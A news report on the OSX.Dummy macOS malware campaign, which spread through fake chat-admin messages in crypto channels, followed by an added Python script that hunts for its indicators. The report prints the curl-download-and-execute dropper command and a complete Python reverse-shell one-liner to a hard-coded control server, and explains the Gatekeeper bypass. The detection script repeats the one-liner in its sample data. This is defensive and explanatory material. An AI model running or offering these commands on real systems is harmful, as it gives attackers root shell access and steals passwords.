Someone impersonating administrators of cryptocurrency-related chat channels on Slack, Discord, and other social messaging platforms has been trying to trick users into installing macOS malware. The social-engineering campaign involves posting a script in the chats and urging people to copy and paste it into a Terminal window on their Macs. The command downloads a huge (34-megabyte) file and executes it, setting up a remote connection that acts as a backdoor for the attacker.
Patrick Wardle, a Mac malware expert, also examined the malware and dubbed it "OSX.Dummy" because, as he wrote:
- the infection method is dumb
- the massive size of the binary is dumb
- the persistence mechanism is lame (and thus also dumb)
- the capabilities are rather limited (and thus rather dumb)
- it's trivial to detect at every step (that dumb)
- ... and finally, the malware saves the user's password to dumpdummy
The attack, first noted by Remco Verhoef of SANS today, downloads its clumsy payload from a remote server, makes that file executable, and runs it. It looks something like this:
cd /tmp && curl -s $MALICIOUS_URL > script && chmod +x script && ./script
The oversized binary bundles a host of libraries, including OpenSSL, which it uses to encrypt its communications back to the server, a system running in a data center of the hosting provider CrownCloud. Once it executes, the script invokes the sudo command to make itself owned by macOS's root user. For that to happen, the victim has to enter an administrator password so the script can proceed, and the script stores that password in a temporary file called "dumpdummy" (the file Wardle's last bullet refers to). The script also issues commands to add itself to the startup items for macOS, making itself persistent.
The script's backdoor, as Wardle noted, is a Python reverse shell launched from the command line with a hard-coded IP address for the connection and port 1337, an obvious leetspeak joke. The one-liner connects out to that address, duplicates the socket onto standard input, output, and error, and then spawns an interactive /bin/sh, so whatever the attacker types at the other end runs on the Mac with the privileges the script already has:
python -c 'import socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("185.243.115.230",1337)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); p=subprocess.call(["/bin/sh","-i"]);'
The attacker's intent is not yet clear. But because all of this executes through a Terminal window, it bypasses macOS's Gatekeeper protection despite being unsigned code: Gatekeeper only inspects files that carry the quarantine attribute set by browsers and similar applications when they save a download, and a file fetched with curl and launched from the shell never receives that attribute. And it gives the attacker the ability to execute command-line code as the root user on infected Macs. Of course, the code also has to overcome the common sense of the victim.
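Wardle's point that the malware is "trivial to detect at every step" can be turned into a concrete hunt. The script below is an added example, not code from the article or from Wardle's analysis: it takes the indicators stated above (the Python reverse-shell one-liner, the hard-coded 185.243.115.230:1337 control server, and the /tmp/dumpdummy and /tmp/script files) and checks them against already-collected host telemetry in the text formats that `ps`, `lsof`, and a file listing produce. The sample telemetry at the bottom is constructed for the demonstration, not captured from a real infection; on a live Mac you would feed the tool the real command output instead.

```python
"""Hunt for the OSX.Dummy indicators described in the article (added example)."""
import re
from dataclasses import dataclass
from typing import Iterable, List

# Indicators taken from the article's description of the malware.
C2_IP = "185.243.115.230"
C2_PORT = 1337
DROPPED_FILES = {
    "/tmp/dumpdummy": "sudo password dumped to file",
    "/tmp/script": "downloaded payload",
}

# Shape of the reverse-shell one-liner: a socket, fd 0 dup2'd onto it, and a
# shell. Matching the shape rather than the exact text also catches variants
# that swap the IP, the port or the shell binary.
REVERSE_SHELL_RE = re.compile(
    r"python\S*\s+-c\s+.*socket\.socket.*"
    r"os\.dup2\(.*?,\s*0\).*"
    r"(?:/bin/sh|/bin/bash|/bin/zsh)",
    re.S,
)
C2_SESSION_RE = re.compile(rf"->{re.escape(C2_IP)}:{C2_PORT}\b")


@dataclass(frozen=True)
class Finding:
    indicator: str
    evidence: str


def scan_processes(ps_lines: Iterable[str]) -> List[Finding]:
    """`ps -axo pid,user,command` output: flag the reverse-shell one-liner,
    or any other command line that carries the hard-coded C2 address."""
    findings = []
    for line in ps_lines:
        if REVERSE_SHELL_RE.search(line):
            findings.append(Finding("python reverse shell", line.strip()))
        elif C2_IP in line:
            findings.append(Finding("C2 address in command line", line.strip()))
    return findings


def scan_connections(lsof_lines: Iterable[str]) -> List[Finding]:
    """`lsof -nP -iTCP -sTCP:ESTABLISHED` output: flag sessions to the C2.
    The word boundary keeps port 1337 from matching 13370 and friends."""
    return [Finding("connection to C2", l.strip())
            for l in lsof_lines if C2_SESSION_RE.search(l)]


def scan_files(paths: Iterable[str]) -> List[Finding]:
    """File listing: flag the dropped files. On macOS /tmp is a symlink to
    /private/tmp, so strip that prefix before comparing."""
    findings = []
    for p in paths:
        norm = p[len("/private"):] if p.startswith("/private/") else p
        if norm in DROPPED_FILES:
            findings.append(Finding(DROPPED_FILES[norm], p))
    return findings


def scan_host(ps_lines, lsof_lines, paths) -> List[Finding]:
    """Run all three checks and return every finding, in collection order."""
    return scan_processes(ps_lines) + scan_connections(lsof_lines) + scan_files(paths)


# Constructed sample telemetry (not from a real host): one benign python
# process, the OSX.Dummy shell running as root, its C2 session, and its files.
SAMPLE_PS = [
    "  PID USER  COMMAND",
    "  412 alice python3 -c import sys; print(sys.version)",
    "  517 root  python -c import socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); "
    's.connect(("185.243.115.230",1337)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); '
    'os.dup2(s.fileno(),2); p=subprocess.call(["/bin/sh","-i"]);',
    "  518 root  /bin/sh -i",
]
SAMPLE_LSOF = [
    "COMMAND  PID USER   FD   TYPE DEVICE SIZE/OFF NODE NAME",
    "python   517 root    3u  IPv4 0xabc      0t0  TCP 192.168.1.20:52144->185.243.115.230:1337 (ESTABLISHED)",
    "Safari   390 alice  14u  IPv4 0xdef      0t0  TCP 192.168.1.20:52201->93.184.216.34:443 (ESTABLISHED)",
]
SAMPLE_FILES = ["/private/tmp/dumpdummy", "/tmp/script", "/tmp/com.apple.launchd.xyz"]

if __name__ == "__main__":
    for f in scan_host(SAMPLE_PS, SAMPLE_LSOF, SAMPLE_FILES):
        print(f"[{f.indicator}] {f.evidence}")
```

Run against the constructed samples it reports four findings: the root-owned Python reverse shell, its established session to 185.243.115.230:1337, the password dump, and the downloaded payload, while the benign Python process and the Safari connection pass cleanly. The process check keys on the dup2-to-fd-0 pattern rather than the exact one-liner because any variant of this backdoor has to wire a socket onto the shell's standard descriptors; the IP and port are the indicators most likely to change.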